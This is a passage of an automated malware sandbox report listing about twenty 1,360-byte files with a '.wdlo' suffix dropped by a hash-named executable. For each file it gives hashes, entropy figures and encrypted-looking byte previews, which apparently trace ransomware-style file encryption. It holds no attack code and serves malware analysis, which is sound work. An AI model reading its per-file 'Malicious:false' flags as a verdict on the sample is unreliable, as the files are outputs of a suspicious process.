                  SHA-256:E7711088BABD75C0FF18126CB0A75D9E676BBEDD8D4A59135CEAF382CCBE2E22
                  SHA-512:D197BB251E8D42AB83EBCCBDAC320EBEEFD400D7C8490427435CEB30582F5AEAA4609AC492C8D3CCA4F554922E447A5131DBB7A27ED2AA50410B317E5BD3F04C
                  Malicious:false
                  Preview:LIJDS~/.'.B..T.s.K.E%........caa2.xg..W..}...)!..s,<>.%:+.>.*...R..../...M..p...........$..X.>..=..|..b....g..m.2.ra. @d4...MI.`2=..J.p.Y....6..<;...2.x}.8..b.4D.$i.o.T5P.!......X...V..j~!..?8.d..vs....)D[.d.Fz3.&.....y.O...9...Ei..g.K"!.\..$3Q..z!.h..i.U^..8...#7..RP#..#.b.g./.fDF.pY.t.y..9.:..?.O.F.b.11.u2.\fMg.'...HH2...3.C...Sr./.5.,w....3X...h{..t.Hm."....$i$1.....wf..c]E+....\i0~..h`.f.g..hxp.L!.L..../.%|.r...U.w...1._.e9Z.I....nF.../....%A.?D..$..w.....u. z.?a..*..z..)@O...2s..E2O+.^......o.Y...WC..Ek...M....mE....\^o'.....7..t.=.z.D....P..L:UI.N.j.........g......%....N.............!.2..j....C.C.....U.f..l..C?....".6m....;vM'..%...wb..#..5.d.....r...Lr....!.....M.).D...6..J!n......`.... ..s.YL$.@#.n,..P.U1/j....W..........iB.n.v^..3...U...VB4X%r..'..L..K...*.....s.....&Uf.tgt......f..M.h.}sp..s....~.D....i...7.....&.~!vj.D.t.x...X8..2]..vRK...x.o...LL..4j..rJ.+].[../..&..R....D(.FxK...'.".C...N.a.IEVt......./z.......=...'g.nE.A..

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\LIJDSFKJZG.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.863445575475765
                  Encrypted:false
                  SSDEEP:24:A/c3O7imGpMnwxTiZhp3HbVkBVSb6zwr4/YNNY8tuQi1tK1hY93zbD:A0qfGpMETum6OzwrCe371293nD
                  MD5:52236544E200C8B5071ADD9B911A85C1
                  SHA1:C96ED865D7C26CDFB7F7E36FA5AABF76EAB4E2D3
                  SHA-256:725C22EDE02F25F3BCD2540620846EC2B27F9DF47BED8EF5135A27A4F47478F2
                  SHA-512:9CD2069A5F6F347468B30C077CE6E65DE548F3D64DB4B5317B3ED24559F516B78C7D79FEF7E04FA5B7C7E119BC29ACE21E0E3BEA025DB15BAF9C39322062A92B
                  Malicious:false
                  Preview:LIJDSc1......nIs...:....._.;...t1..~.|......).}....e.....?.q.[....3c...[....L%9U...S..!X..Ff.^K...7..u.kM.....VT...@.j.~0 .v...._.}...{......N;.LV...,).....thZ.y.Y...?../.Z...O).........>...]...yKPT.F...a..X....0...R..D...ra.^!.i".3.Oj.........!..tw.#..$.....s0."....P.;...'2K.`):.O......H.....+...fX....M...2X.n...,.G.&L.!.....x.%Q....nC....6"~.....^.../....<*..*A.....E..Ro......|Yy..)$............C.I......ne..J}../.7h[...]...8."..`{.....S.....&S....n....".>...DP..+.,B....Z......@...f..|......'B...H....-.N.rq.m}p......."....(.!..q[...R.....s...B...."zd...b.:.;.._Rw.......l..i..+(f.;.......\7...A...0.<...Yd.\Qw.Wk.A.lHW..P..9.7....@......v...#H...i.........:H.........4.....8...(,^.B...$.kV....g...J.q.Dn.^h..b......i.{...]...c1..=...{..q...c........<....K.%...2....w.+..p.(...I.D..W."&S".z7.9..L.....8".[.Q|....'.g%.\.h;-"....p.P..R........_.....u.W..S...F..+..h...........;.s..}Xs.l`.|G...x.D..E.3.....?.j..W;;Q.....y..1.6C.....s.....WS.H./...(E..

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\MNKQCGFJDG.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.846257323599437
                  Encrypted:false
                  SSDEEP:24:k0PyxjZMYbHgUz2CGhW/3k89vesDBrSWZUXGTz4lhoWqmX0jEjEced9AYM3zbD:xCjZMOHgoGh03ney8XonjEjXF3nD
                  MD5:7ED18B090BBA5E6D5E4A1549840A15FC
                  SHA1:DC2568738822BD16B1B5A2246A93F7B1E22A06E7
                  SHA-256:98D549946FBE0B60CB801ED7414A76CC82A02F26B3C076643E23DDF232E2DF2B
                  SHA-512:09BAF18FBAF7F506EC3D0A2826A907CA7B1E2BE9A552F427D84E24813AF2BA9D79FC02B6784728655BA3835AE741137FCFA0D7D7045C89D2AADEC700E23EEE40
                  Malicious:false
                  Preview:MNKQC........2.....VmkX..Z|D..M.h..\$.e....}.....#.&;.p......xM..E.\X...# .\y(M|z.){I.Y.{.XH...W{.>......M.....Eit...Y..S.J..W4do$.>F.....x..]..-C%.......uZ>..De.....*.1/.{.AGV.:..^b+_J../.y.%...g..>....l.C.0..%..`e...|...fV....\s.. ".M..W......lj..K#I..5..C.U... 6.h.....(c..T .....D.;...'..v8..B...yX.+jo9..gE........Kk.;.Za.$I..mC*.\d..._.b].A.G...R..\.tYn={M..........r.v.n......R...!....=.L..V..Q.....p'...oD.&..}.Q..U.L..M......z..F..... .nw7j...:S..K./m..f. }&..%........V....j.o...C.. .4....>/....~x....&......K$..5.0...cO+.*.[.f...2.=@Gb...F&....jbb...Nlg-l......S.05..Y.E.B.cV....4..q.IT9.g...o..KSS..X.w.....z..m....j..x....f.d.D..m.U+.f..]:P.4$.?..K.......u.gJ...g..k}...Z.e.>27.pb..`Xb..:u...`:.[..J%+.u..w...*.$s...<..."<..1.eP..x......"o.(..;k.I..&....r;.M.T..T7.+...v\.h....\.d.M.Z..GY..J..q.......N.z.X.(.>..U...p.qCvH....,pX..X'M..C..K][[;.jFA...f..Q...+.U..9..Qk.<..@...a3.5.{.....4.]..a../$y.....O..!.g.-.n.+.E.r../..a....].s...

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\MNKQCGFJDG.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.854425365621791
                  Encrypted:false
                  SSDEEP:24:d2+Kl6Aqo0T1yKcRhJvhf5ZzGELTEt1C5NQ7Ly3IHk9QjCMSSneES83zbD:QFkyK0zvhf5ZTmKNQuIMQOMSSe783nD
                  MD5:F2487E7B9AC2CF043B7FA7E9267943E4
                  SHA1:98CF64FD56B6FC0F7D6B56FFFBBC63F0BED34316
                  SHA-256:421CDC1F48FA085F1F45D336EF7974FA43170FE09FECC97BAF17A060670C2D98
                  SHA-512:1DBD4930885FFE36B90EFF8A01A484CD330EE9A81ACA454B11AAAED9A52FE2F31E3ABDD72BEC6C31983B1B44D03DE12FF26E45EAB781091B9800A9F1AE0C03D6
                  Malicious:false
                  Preview:MNKQC].Em.....>,$z..w...#C.?...:.{.w*..U=3y..'R...G..[...5E...B.........:..+?...=.......p._...^..C."..`*v...M.J}.*B...]#@.(@4....l...4k.$.7...c..p41.K5.'.n......G{.}.....9..F2.T.\..A%.",.)....D...\..~0...v.....8|...9.?....;..:.j..t.....$.g....2....x"z.].N.~..........I.dI....A.D...'.....w..1.........)U|.f.T._r.1...B...[...M`....PX..+|..`.g.a..M.,J&....(N..b..]m..3*...Q.....,|...;.A).7.....p..+*%L#.b#..2+...4..1.m.+BfC}[G#co.:tN.lb..S..e...o...h=.i..r.cb..`..b..c>haj.,..YY%f.i.L...cp......UzW..Q.....X$C.^p.q8.........On.;.V.........&_PSN.`V.`{..H}....$....(KU...........kQI.L.n..C.......c}.K..YY...F.v.#.E......\u.......=.6".!k.....U.................l...$$A.......2R..3.....=Q...lmM..Y..xE..O..._t.i....zM.'.7...+...X.k{....G.....N[....hK...{..-..Je.D.q..|.~>.]..q...*.{..8?..F.k..l.w\=.C.C_...P.[eM..Y../.%5ae..P.........l..1EC...S.!..O....E......5..[.....[<..-.i..|.8.....-#|.1...(}]D......'.......`..S.....j.k..:.......?N.v.!|M..B....

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\MNKQCGFJDG.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.814959026269785
                  Encrypted:false
                  SSDEEP:24:eHkR9JqddA3W60qYQGv7qYthfbowovj7k+qAukurbfR3l3rkhyK81XDV6LnqJ/Tl:skidA1FgDthfQMAurbJuICu/doe3nD
                  MD5:6B2E380FF2E53E14E92D255D64E86F01
                  SHA1:FEDC4EF1C9B80C15D778743D6A32EF341E6A00DC
                  SHA-256:710D656CEEB23461228B23B53B3112022C885943A485F1AE9545C6771CC9C0EA
                  SHA-512:55F2AD51C85BCE553351ABCBC7FCD9FAA4E0F0CA4B2E7EA5083AABCB74166111E8952A05358244C38D22C96BE7EAA4CCBA23F303613A5F394394C2A669E8EEE8
                  Malicious:false
                  Preview:MNKQC.9...R-..l..e....POH.B.....A.ee.....e._,......;x.........%.....4`/.O...9-...j.........K....U.H.0....y.1JS...1(x....ec`z.....(<.$.E...Gm..%.._..On..QM6......$.@.c.x].l...u.....5U..W.!..&21.i...m..ho..d..T..x....w.Y^.:d0P.&..(z..PE....B.i8..ji.......a....|`.0........{#'s...z....A..m.8..>..Y.c".x'..9.Z..h.1AJK.G..4..[.)v~N"...kp..........Q}..|x..kY..*&..l...K.5... z.5{...7.iU.Q.thP..Q@..s..)[.g....y.0^.m.......;.r..zP...N..nV.......3q..@.a..-.'..2A...B .z.1z*. ...U...o.V.;...a.5.v..l ....p.C.4....@7.A...!.J...oY<"$..pKQV.6...f.E....)..;..[.y7.[.}_B..E...%.Q>....S?.E.t...O.....w^0.Bh..cg..F......{S..8..9f.;...F._,.k...1J.T:.....Q\8T...b....Q..Z..M..@..T.VZi..mG}.0/...;\.........&.Jk .Nl....e.V.2.f..Q.f.kT...s-,(.I.....\....ME....R.Q%..w...G.#^./.Y.59%..")h._.2..H&.....3.i.a.......9.^N...v.......@..{.MK...r;>r.'.L..%........&j8H <-luV..\.tL,Rm."..B.]...,....Jk.6Mlu.+6e...r....\W.:y.l..Srl..qH.s...>.z.....?..&....IRY.7.2.M....dxwJ..U.)...

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\NIRMEKAMZH.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8440331648206385
                  Encrypted:false
                  SSDEEP:24:ni5kX8jn+KJ5sRo9ShN9j3iXPfayTdzlnyQ4ow4cBve5I3HvFqY3zbD:xX8KKJ5sRocN3cPfay5zx4jdMIXvFX3D
                  MD5:65D098E3FAA16A012FB512615DC9F78D
                  SHA1:F9FD223D44D89E6B6446BDC2C62EDD8AFFD32D70
                  SHA-256:8F14188D459A8475B7201285FE3F5EFF1F3FB5EE0EE231B8E8756F72D3EAE682
                  SHA-512:5737A8A4048268A0ACB9827773860AC45EABDC5B2E77E8FC42990D623535F31C202E425A22D57311EF498F43751A46885965BF6D637F7FE31E67A89531A16B4C
                  Malicious:false
                  Preview:NIRME.....|j..........6.A.IFj..../...q....4..1.@-.9......9.......{...0...7..;..D.W.....".....^..k...:r.....B.hy....C.:.-.K.@.H...zK......@.s......=....6....:.+...I.......q|K?..._.dy...c.Gf60+^..V.._..~..0O....,.0..}...l%..J<..a..Q#.Cic$mB..J.+..U.i)lW.A...(.....{.-.Z.:.1];E..U.....cULG...R.W.'........]....DG.W..1..BlSE:..l...$.A.....BX`JKQ.9.H\m..U....[.&M.A-...._....S5...NB0.SR.%.]S2o....U..t.......#X.b.j...2..,..O...S..f...W ..b....jzM*...J....|#L.".H.Q..]5/5...\..._)....z1m..a5&......<...1.U.mi |.X-..?.......F}...s..;y^.`>..j........e..|-,J{.I...a.?.F...........u&b.2G.K.2k.....%.NCK.......0y.%...K.j9..c..>RX ".,A.8.o+....\.k*.............%+}.1.k...m6....%.0N.i#2L.AFO.....8.."..I...&..........D.....v.Q....&4...8B(S.~]......P5*..hLj9.E.#.(..q.[d9r...n;+...z*.Y.c..&.i..`.q.r..M!rw.....Th.........Q.y.z)..1.wo.!A~qPQ...).....H"q..^.....K...w.h.('...X.O~...... ..0.r..M...I..7..O....|..:r>.4....X.y........99.....<.|l....!7K.

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\PWZOQIFCAN.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.850087405564854
                  Encrypted:false
                  SSDEEP:24:5Wo+emARl+hG9kVJ2BRRos5ytrsGCj2msnpa1mv6FSdHVTjwOScICP4k3zbD:YoAARlj9kVJUis5yFsz5CULSdHRkOCCn
                  MD5:5214FC3C9ABE35FDD09105589DD2B20C
                  SHA1:DAEECDE03F9707A6D082182705A4D75CBCD97E53
                  SHA-256:B7CCF02C3EC34471256BB6A358C9F35281BDA5A8BA5FFFF5C9B92C36DAB2FBBA
                  SHA-512:9F589DB38C5DD62867C36EA24EB0907A993235B9F2454A076ACCA084D81C17DED75BDF9AD41C3FF890E105482892B0241489908F999FEBC130D614ED9682A164
                  Malicious:false
                  Preview:PWZOQeMEK$.Q5)D..n.......n..r.<.."2...;9....x.o....t...$...6..=.'&...|e.N%m...e.'.5\.U..c7.\.......-a;m($n...$.>n+~=..A3v.N...ea.H...;...G}W...aq.FX.W.'......."[p&.B.......h.(=.<.s-....GO..A0v....9d./J#...+*.........tkCK_\.....N....>5!......a.."":..:.x:.r|.K.%....B..U.P..z........p...h9.C.....4.;4;z.n.....S0Y.wiU!.].....:.#n....5....W-.R...J7?.z..~.....%w...Q.y_.{Tm.o>~.O....@..G..s..4...K.;m..S..y/.t^..../...lU....hA.Y.g....G.xn.J..Ho........k..x.h.{S~...J(a..X...Rg}..Q.?.1O.5+:m.c..q&i[,..o....C'.u...v..Q...6..h.e.s.....6*'.T...?%....`,.".)...@..?m..1%.{W.X.Q.**...(..7aQ.D..&._.(~p..R.y%..H.&.q..6...7{.@}....m.@un#..H:\B.m.ku.4.q.!...cS....m&....9....J.O..k.KX.<Z........S..UWk.B*......bu......~&Y/4..e|..Cl.{Q....8t.......a....be...|.}...eg.....Q..W.......Xr...'......L..B...7....k....D....(..(&..[..|.... ._..a...d..bN.\9..s=5....$.P.h4......l..h.d..g...k.e41..[..O|.086..{......p...&.,"%....2H1]..W.">.S.+..nh......e.>....I.s&...H..7....

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\QFAPOWPAFG.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.867498157873056
                  Encrypted:false
                  SSDEEP:24:D4ctQ0l0DEmX6MijBbCUGz1ScLI0UjMcwZ4Tpm55P7hZT/y62JkofQll9u3zbD:D4ctp0bqHuU21+HwG0vrDy/Jkl9u3nD
                  MD5:49CBE5EAA022BEC8668386FB37F5E042
                  SHA1:29FF4CB652DC4BEEFD80301043070C490BA92661
                  SHA-256:B186CA8867CF5A029955ECBA19318D5BF4DB42C99F1A12FA34058F68F699DB78
                  SHA-512:DE58C742A1EF4EE280AC29B29A4A434B994E1EFFB9A23E32BCFBDD761C4BE547B0772FACDA538DE70A371410DEB1D2FB51AE055B8D661FA955349EA49C54AE1C
                  Malicious:false
                  Preview:QFAPO......ld.H./.P.Xb...A....r,r9....g....J.A.=.~.b..}...y.G.~..+..........x<.L.8.....s1.....eA.n..R.I.......V..n.Az{.....h.\.}fK5=Er.t...F..r.E..?(.=Pm..qR....2..I..Z.....e]J..]....G..J.}.:......E...i(d...?0..L...).........E.t.G.f'.wFj.c.F'+.c..YN.xW.i..3r..U.s..m........g..u8..~t.a.......b..^. f...:.L.....Kz.3..W..4<.Z..+9m.d~.F;h.v.cQy..Az,.e.R.:.B.f.I.A..d":`K....8*-.S....*...k.....N1...8..B4....J..f......h..Q.....!....q. ..G$...T.9V.Q.m..1...)0.........n...^.7..f+..pY.xhc2.^+...n.9].dV...p.&.W.......u..u.."S...=...j4......N..5.V[.}.......<J....yXI...<....r......=.q..=...={a.@..#.X....H..[)..x.-z...9.h.....4_T..im..a........h..oh..O*v".Z..$.y.Z..wl..~.m.mIq.!!...R.........v._.#......nw....'..!n..w...5...0..Ar{%..!y.g.....?..jqF..L....Z....m.[@5o....hR../.H..u....*;.v.......Q..1....C.R/z..##...|,.h...l.8..n.Z..GCT/Z.|...|..t1..ZV.K.=......5.lW.Q...5.6<6.[]...q...|<.].5...Z.j.R...b.j0..o8.5...=T.vV.8:I%.....;...f.b....s@|.....8

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\QFAPOWPAFG.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.849059742972895
                  Encrypted:false
                  SSDEEP:24:q4SJM/znHTwSyxLIjZ6MRgMlguBFpZHEcuWCR0O88HBl7PxB+iYa0WdxVy3zbD:q46M/X1CmHRgMlrBFbq5TPmiY9iy3nD
                  MD5:EADEF1B72857535B1241FBCA463D4A04
                  SHA1:59F95921DE0ABAA8807F5F3CF99453F67482242D
                  SHA-256:0899E7ACCCAABEF5366029361B5CCD84722D7E04B4D513C688892570B33F6D59
                  SHA-512:7371041799B35DC40F6C58D656893CD55F13C32CF8DB5A37EF9186CFA57C337D92C44B04F066B239F7147566FC4E5AE169B94E25C06D028987A404026A53F71C
                  Malicious:false
                  Preview:QFAPO.D.B.'f.i.....M.i..!g......L.M...]..-......G..p.;.....b_y.<,E.D....<.5.....v.v..L..C.e..+.............^u/..x.4J..M.E...L".....y;...r.,&^..6.v.M.....W..;B.BN.,....'..x.8.E.O...).>s.<...T....I..I$..<...x/4......L.!....X............k.a...meD...8.5-.....y....i....-t2#.......3..74.N.6.C.L.{..J.v.\`...L.F..r0X....%.O.us~....}^.{#.EW..g.c..:.qY47..1KC..o^.;0.A....:.......#A\b.0...$oI..N=v.#g..r....5...G.........{..<?lMp..8..3..gSa.z....`;,.M....E..1..T6..........$..!..V9.o6.(M.i.E}.-..?.."f.z.......I.%%.?...~..7..u......BO.[.O./.<-.x.w..-hX.)...<....@!2.o.0Y1....(.......Y...Zo....dg....%V :...O.1t..W..b..m.;.=..U..;.e...=O...0..D..F.....2...Dc......;.!]..>.p...D...f..i.......d1..e...4.....N_...z....K.o..g...".eg..K..4...BQ.>[.......~..iG...d.....Ii.M.Y...G1.....=g?.=8...P...kV.)*.1.....Y.s.5...,.(k.R|...'..S...5......P..&..P........u...`.9...\..s./N....3n.Z...`~..'@MT4W.;.......;xk......k..c..;.5.^...y..'c...q.PN.+s,..S@zq[....J

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\SBVUSFKOGN.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.862863296423055
                  Encrypted:false
                  SSDEEP:24:Q/vzArt1VblUEQRPNzawaKw5YXXrtNEh4UMgWxvnJiFKade0nzBP+vua483zbD:QH6tnpuHzvaNSXXrt+SU3vKadeqBWvuO
                  MD5:93C9372DB8C5092F81FF561DA37F4C23
                  SHA1:16632DAE28F607F01FD23093A0883A6BDF3A16B0
                  SHA-256:7C12889A76010D1EB5B97665592FCEBF540380FD04F20A15E03F9A113E920E2F
                  SHA-512:6E62F42F3BDABA84C998405D9A3F6A43A61D5ADD42D81773772542AADCDA151DDCEE050C6FAB996830977B6438EFD76F4A126D07796313FD130BDFD4E2A7037D
                  Malicious:false
                  Preview:SBVUSg.g..8!#@r.(x....b.>Mx........F~..%5.=;?...,;.._.4 ..&.."...].....]..}..]...>.t..U.G.........&...8-M.O.O..z..;..c.{(.....J.CccNG` ..~x..8#.<.g.UW.lT.<..K8.+....Nwe#.+...rM.1..~..N[.2....,yL.C..5.....{.F.I.r..._...."s..O"tg.z...n4rz.[N.(.(.J.l..$..Y..N.../..Yv.:..........1.:.....B...w......1+13.y.T.T....9l_... .%.a.r..b..)...x..w..3..q...|%...mqt..=M@...`3...k.R;.`.gM..2"..}..wz....>..&v7.^Q7..c._...y.=....Y....X.[h....W.[jZ~..k.B.K^b.4.Dt....,.....{...p..e..2`......$..ni..E.2.1....e...."....k.(.`....NI..C..{.L..r...oI..l7W...(\..1..+.1....R....j.@.'=...^V.....^.....V..=.Q=V/.1pv....n.*.ai1..lO.]./..ch.,5d.."..V...7....Gc...J......<V....AH.9i#...5A...#..jS..P@......cc..,@..7....&.X..Y.D..y.'.x.Q..{....<.tm..a.>..V....McF~......v.).........Q..U..........v.8....y`...P.i......%....)=......r.....V.....^f...U$..59.!..|+.U.s..Ej...K..._.....Y...x`\......[g6rfJ..s....ky.....)`;_.@..e//..q.O.h.(o.j.M.o..hC.1..>....t.n...O.R.>..dtKk.N_'.

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\SNIPGPPREP.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.851473956541967
                  Encrypted:false
                  SSDEEP:24:CirETKjjMhrrs5PBt0ii64Jtliv4yLCQur6NAtwFnjXhlzbMHGKpE/4VCt3zbD:rrrjYrreBt0D64Jg4MCb6qtwNjXhluTU
                  MD5:8105ED331229B7051A642D7194AAEFDC
                  SHA1:82686FCA51E77F267FEDB3628F55BB124A0315A6
                  SHA-256:50213F97EF3ADA8A9A0244757DEA86FA52BC01E4F3C13DAC74E7E3931B530555
                  SHA-512:0B293E64FDBF387C20F376A448C7FA4FD8B2918872FF3489347D99E37B288C1F5D63685DA67128B26F9E44988B8E8532FF450319BC1E0EEDF406B76B1BF22A9B
                  Malicious:false
                  Preview:SNIPGg.%.Pu.=cfI4.6<..F1.BH.(.......Z'.....j7..sW.?s..m}....2M...c....$....}.....9he.{$.3..8......@.~.1..[Gar}...wd.G^...N.3u....T=:..hj..J..v....-..D<F....J..?....1c..>x.f..^..k.?.CB.4k....2).&i...l.W..^.%........`x.yjC6...h.......T.y.I.Y..{F.)..e..@.aHk`".mI1..RZ....qX......:...DI......*.w.DP..........b?.L.D...hN..........(b.7...E..6^.^jN.s...8..Z7[.Lw.......!..+.b:l..)..A.M...P.9{.....P.O....C......p.tfS.XW....t.F.E.P.....=.!...e....H..U.E.-g.7......f3]D...W..A.9..........'7.?...TW..._...n.|..g.<]..RyU@k_....../....2..bD..`...BG..:...J..u...G.......N..^u. ..$-\...)..$....l&.8.R...@".......S........6x...l.".h....2].*....6.c..?..e ..5.dl.[...X1..5$.}..[.\S*..GG;..O..g........4g.O.........B.w_kG\k...^4.........^1T..3dB...p.}9.a....yg&bO.~.GmE.U..H.$w.. ...T..Zh....s....ag.S7J.........z.`....O...V...f&C..xK%r..]..j......*.(..COz....2......x]..gjY.Oh..+..h...\....k..I.....>.i....xh7.)....|..>;.*..3.....iw[..!<._.n*.F....(.~.#.1.5~..Fu

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\UCKFKZQOSO.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8551831160154295
                  Encrypted:false
                  SSDEEP:24:1OFgWL1LyTMxVH6hyOyYL1rtXsUW9KL1/MrT390il1tB6+P0SVP/f03b+yB3zbD:1OGWMeVsydmu0dMrTCelhe+yB3nD
                  MD5:C41E8297881936FA62C75CC348FC7196
                  SHA1:27163B9CBAEB1D24DBAB69CAA647EF02C7617B8D
                  SHA-256:FC16D989F8D1C850AB765484043161D2FA6DBC47833F8B9CA8B2957CEAC897D2
                  SHA-512:BDB7374A439E20EEEC257C69B4C0AE42E42F9705E7E5055B6E274E5A39A12817CBB6E097321598DE290F284FDEA90C463DD1A6A2146F7386D73E9629C5AFCA22
                  Malicious:false
                  Preview:UCKFK..>(........K.Y..;^.Sh.2........7.v>.H..\.b...j6."...a0&.N......C. D............?..)...I...7-....zi.'..n..".:....#.3.....6.........k.'.dYh.....h.*..oN_p...>.3\L..A...z.TTN.G.D....8&O_.............+Q!.g.......Q}.....H1A..+.Xb...........l.>...G.(3{X......C.._.T..Hk...!...7..C.(.c....v.P.-Z..^...2b.O..`..6......~.....C..!e....C.K$.. ..1..AU...m.s....).mOm....l..n........o.4U...j.....mY?..Q)...kL.u0.R.D4z..1...1(...pn.JJQ.M.y....8....Q. .H.,.Ml.......p....Wj....}d. TB.>k#S...Z!.s.U..O.lW..g2p...L/..U.]....E.q..ke.s.K(N..x.O%...EZ....l...8E.8(....|...I.s...XCW....D...kDp...t.J|..6..!.gp.Ec..$]....1.B_we..<.gn.K.U.....Xj.~k..k..A.w.e.8U.@}.7,...../.;.....VkbvB/1.6.J..B..%."De..aIy..8?..C.4A.YRC.q.....[zj.....e.;.X....9.......M.Sw...q..Iq ~.......5WD...^..n.uu.s.@..p....)`..C;%.'....7.4........\....y...T..t..S.M.2.i.3W......Bm9.E..V..h.,..|...0.>.....u.@r...DF....../....:....(..L".^AJ..c]..V9...t<...(..N.0..)...UD....=s..u....W.w...

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\UCKFKZQOSO.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.847609168557958
                  Encrypted:false
                  SSDEEP:24:4Az/g6WbCoRVl4aZRZUsK8qxPE+4d7CrPMPlgb/mYlZ1sZFtx3/YT3zbD:4A3WmoR74+ZfK8Ic+rUPiKlFv3/m3nD
                  MD5:57A4D63D985169F8A6E1FFF38789DF4F
                  SHA1:6EC197708EFEB4B5EB208C2223AEF9C27021CC23
                  SHA-256:202D2D54DA54D639F6CF6DFE2502A8F3126F0D8E0C84CC32171DCC2166A5D373
                  SHA-512:33EDA32BA163EE1061FCFF4E4B0602B147BAEF15FA2E7F200B8D6509E9E7409CCD139A7EA7C8F4CE52370577B66831F8D66401DB222C791184819117B85EEE4E
                  Malicious:false
                  Preview:UCKFK9.H..G.z.x.?7.Ap.`...T.I..D....i .1}...S.v[v..U+..!.W..$.W.~[bC.cL...M.W88K.>...a.e^..S$.....I."......J.^BF..Ah.t......Zd#.....w..."k..A..?.Wu.).Oh..q...R$.._.8@...d7D=... +z....c.!t9+.x....K..Kf!d..!.(.f..;.Gz...7QV^=....wA...F9...}.$.M'.....l.d..]?..f..ry.*;yt.....x..(.SL8.o..TJV...b>{....J...v .Tr.:.._......HK..^.8Z..a..%...-ZcD...oCO.2;..K.T...0;...B-.............m.W..."P.F....VV.6./l.t@...1..<..i...(....L$....C.9t.pC.2..|..R<.|+T.I...._D!.+K....}..".i.)..S.e...[e..*....`d1]V.4J...j...j.(...Vs<..Z~...4.\...I.[.J........z.......St....K.420.c.C(K(.U...7>.L_.`....!.y..f.z.7..FH..x..|.......>w...%8C......iy.8..[...kw],..5.....8..o.;...$\....lo...?`J..i....I.*.....f.SJ....y.\.y..z......!S...t.DD..{O... .4i.9....w....ww.^0'...J.....c|6.,".{.x.j.2..lt.....B.gRL".J..=.....D....%p......{s.&.i(..3v:._nH....exR#....c.?^.".O#...t..-..{].S..XA.T..o....Q.O..7..f..G.YX|4F.,.P.9....vXz....e....M..yCAr.RA..z^I.KSA...'...#.....x.y.....

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\UCKFKZQOSO.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.854477466520025
                  Encrypted:false
                  SSDEEP:24:qAl4kHrIfG7oYahoLM88Dyh38hIj/XLqOF6SarmM/bkC7Dxw3zbD://LIO7oYahoLMluh38hW/XLqOTaiskyI
                  MD5:2BBEE34CF2D024562187E467C9604CF1
                  SHA1:3D440FD6FFC85B5B8BED9FD5FFBD80ECF699A3FB
                  SHA-256:2C033C95FD6A19158291E13ED94228CD1DD6AC3DCFCDD3C2D37BADA74DD14510
                  SHA-512:881553FC71D35BEE29FF2E980ABCB196679933D1D317391A1BFF5BBC73C94CC0FD1E15B56E2F266B9204495AC49A677DA6731DF4B1C6578B0C59A33BDB4EEA4A
                  Malicious:false
